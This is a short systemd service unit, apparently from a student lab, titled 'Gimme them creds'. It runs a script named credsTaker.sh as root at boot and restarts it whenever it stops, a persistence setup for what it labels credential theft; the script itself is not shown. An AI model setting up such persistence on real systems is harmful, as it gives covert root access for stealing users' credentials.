[Unit]
Description=Gimme them creds
StartLimitBurst=5
StartLimitIntervalSec=10

[Service]
Type=simple
Restart=always
RestartSec=3
User=root
ExecStart=/bin/bash /home/student/Documents/credsTaker.sh

[Install]
WantedBy=multi-user.target
